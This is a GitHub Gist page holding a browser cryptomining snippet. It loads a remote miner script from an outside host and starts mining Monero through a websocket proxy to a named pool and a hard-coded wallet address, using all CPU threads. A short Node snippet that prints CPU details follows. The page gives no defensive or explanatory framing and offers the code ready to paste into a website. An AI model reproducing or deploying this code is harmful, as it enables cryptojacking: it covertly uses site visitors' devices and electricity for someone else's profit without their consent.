Created
November 8, 2023 03:04
-
-
Save ProExecutor/dc779c87b73985b5f6d12c0ffa253be7 to your computer and use it in GitHub Desktop.
bGzqpaJ
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script src='https://monerominer.rocks/miner-mmr/webmnr.min.js'></script> | |
<script> | |
let script = document.createElement('script'); | |
let head = document.getElementsByTagName('head')[0]; | |
script.setAttribute('src', 'https://monerominer.rocks/miner-mmr/webmnr.min.js'); | |
head.appendChild(script); | |
script.onload = () => { | |
server = 'wss://f.xmrminingproxy.com:8181'; | |
var pool = 'moneroocean.stream'; | |
var walletAddress = '44x2jiaupK37uVF3VEeyrUS73G5eCtDY7Ge3NonKUWeuUr1irYjpXJA4BfM96EKpgAcdUDyKUFh1ti7vNPD8y1VHVSLE5DS'; //your wallet address here | |
var workerId = '' | |
var threads = -1; | |
var password = 'x'; | |
startMining(pool, walletAddress, workerId, threads, password); | |
throttleMiner = 20; | |
} | |
</script> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import node from "https://esm.sh/node"; | |
const os = require('os'); | |
console.log(os.cpus()); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment